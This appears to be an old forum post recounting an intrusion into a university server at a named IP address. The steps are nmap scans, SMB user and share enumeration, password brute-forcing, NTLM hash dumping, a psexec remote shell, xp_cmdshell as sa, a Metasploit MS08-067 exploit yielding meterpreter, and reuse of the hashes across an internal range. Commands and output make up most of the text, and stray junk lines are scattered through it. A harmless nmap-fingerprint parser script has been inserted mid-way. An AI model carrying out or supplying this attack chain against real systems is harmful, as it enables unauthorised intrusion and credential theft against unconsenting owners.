nmap + msf intrusion of Guangxi Normal University

Posted on 2012-12-4 12:46:42

Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
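Port 3372 is the one service nmap could not name, and the fingerprint it asks you to submit says why: every probe got the same six bytes back. The script below is an added example, not code from the original post. It joins nmap's wrapped SF- lines, splits the header fields from the %r(probe,hexlen,"response") entries, undoes nmap's escaping (\xHH for non-printables), and checks each declared hex length against the decoded bytes. The fingerprint it parses is the one printed above, embedded as a constructed sample.

```python
"""Parse an nmap service fingerprint (the SF- block) and decode its probe responses."""
import re

# Constructed sample: the port 3372 fingerprint printed above, with nmap's line wrapping kept.
SAMPLE_FINGERPRINT = r"""
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
"""

# One probe entry: %r(ProbeName,<hex length>,"<escaped response>")
PROBE_RE = re.compile(r'%r\(([A-Za-z0-9_]+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
_SIMPLE_ESC = {"n": b"\n", "r": b"\r", "t": b"\t", "\\": b"\\", '"': b'"'}


def decode_response(escaped: str) -> bytes:
    r"""Undo nmap's escaping: \xHH for non-printables, \n \r \t \\ \" for the rest; anything else is literal."""
    out = bytearray()
    i = 0
    while i < len(escaped):
        ch = escaped[i]
        if ch != "\\":
            out += ch.encode("latin-1")
            i += 1
        elif escaped[i + 1] == "x":
            out.append(int(escaped[i + 2:i + 4], 16))  # exactly two hex digits: \x00 then a literal '0'
            i += 4
        elif escaped[i + 1] in _SIMPLE_ESC:
            out += _SIMPLE_ESC[escaped[i + 1]]
            i += 2
        else:
            raise ValueError(f"unknown escape at offset {i}: {escaped[i:i + 2]!r}")
    return bytes(out)


def parse_service_fingerprint(lines):
    """Join the wrapped SF-/SF: lines, then split header fields and probe entries."""
    body = ""
    for line in lines:
        line = line.strip()
        if line.startswith("SF-") or line.startswith("SF:"):
            body += line[3:]  # first line carries Port<N>-<proto>:..., continuations are pure payload
    port_part, rest = body.split(":", 1)
    m = re.fullmatch(r"Port(\d+)-(\w+)", port_part)
    if not m:
        raise ValueError(f"unexpected fingerprint header {port_part!r}")
    header, _, probes_part = rest.partition("%r(")
    fields = dict(kv.split("=", 1) for kv in header.split("%") if "=" in kv)
    probes = []
    for name, hexlen, resp in PROBE_RE.findall("%r(" + probes_part):
        data = decode_response(resp)
        declared = int(hexlen, 16)
        probes.append({"probe": name, "declared_len": declared,
                       "response": data, "length_ok": declared == len(data)})
    return {"port": int(m.group(1)), "proto": m.group(2), "fields": fields, "probes": probes}


def constant_response(fp):
    """Return the shared reply when every probe got identical bytes, else None."""
    responses = {p["response"] for p in fp["probes"]}
    return responses.pop() if len(responses) == 1 else None


if __name__ == "__main__":
    fp = parse_service_fingerprint(SAMPLE_FINGERPRINT.splitlines())
    print(f"port {fp['port']}/{fp['proto']}, nmap {fp['fields']['V']}, {len(fp['probes'])} probes answered")
    for p in fp["probes"]:
        print(f"  {p['probe']:18} len={p['declared_len']} ok={p['length_ok']} {p['response']!r}")
    print("same reply to every probe:", constant_response(fp))
```

A service that returns a fixed 6-byte blob to GET, RTSP, SIP and a 404 alike is not speaking any of those protocols; before submitting the fingerprint it is worth connecting manually and checking whether the reply changes with input at all.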

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB NSE scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241

// use the script to enumerate the account names that exist on the remote machine
' I3 d6 s+ |: [
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
# I7 o' j' U) P; d' @9 R8 _
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241

// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241

// recover user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
0 r2 X9 C% u. U5 Q# s1 u
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
1 E4 I. s: g5 j
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
% o  J* H0 R  D8 m
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
. s* F& \6 `+ ]( O
root@bt:~# msfconsole    // exploit the MS08-067 overflow against the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit

meterpreter >

Background session 2? [y/N]  (ctrl+z)

msf  exploit(ms08_067_netapi) > sessions -l
' V; C5 h. @+ l" z# r4 w/ F6 g
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254

// try logging in across the whole internal range with the usernames and the captured hash
5 p* M+ n- }) _" p3 A% p' I- p* ]" c( Q7 G* z! |; N
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

The attack succeeded: a simple msf + nmap attack~~
. v& X+ a' J2 E4 T" W7 M) {! D( x0 z  m